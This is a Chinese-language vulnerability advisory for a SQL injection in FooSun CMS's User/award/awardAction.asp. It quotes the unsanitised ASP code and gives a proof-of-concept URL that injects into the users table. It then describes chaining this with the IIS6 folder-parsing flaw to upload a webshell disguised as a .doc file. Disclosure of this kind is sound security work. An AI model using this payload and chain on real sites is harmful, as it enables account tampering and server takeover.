风讯(FooSun)awardAction.asp页面存在SQL注入漏洞
- 发表于
- Vulndb
发布时间:2010-06-26
影响版本:
FooSun > 5.0
漏洞描述:
在文件\User\award\awardAction.asp中:
Integral=NoSqlHack(request.QueryString("Integral")) //第14行
if action="join" then
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
'获得当前参加人数--------------------------------
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")
数字变量Integral使用过滤字符的函数过滤导致sql注入漏洞的产生,导致可以修改表FS_ME_User的任意内容,配合系统的其他功能可以拿到webshell
<*参考
http://wavdb.com/vuln/1672
*>
测试方法:
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
注册用户登陆后,访问Url:
http://ssvdb.com/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1
退出后再登陆,在文件管理处上传后缀为doc的webshell就可以拿到webshell。(利用IIS6对文件夹为*.asp的解析漏洞)
安全建议:
厂商补丁:
FooSun
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foosun.net/
原文连接
的情况下转载,若非则不得使用我方内容。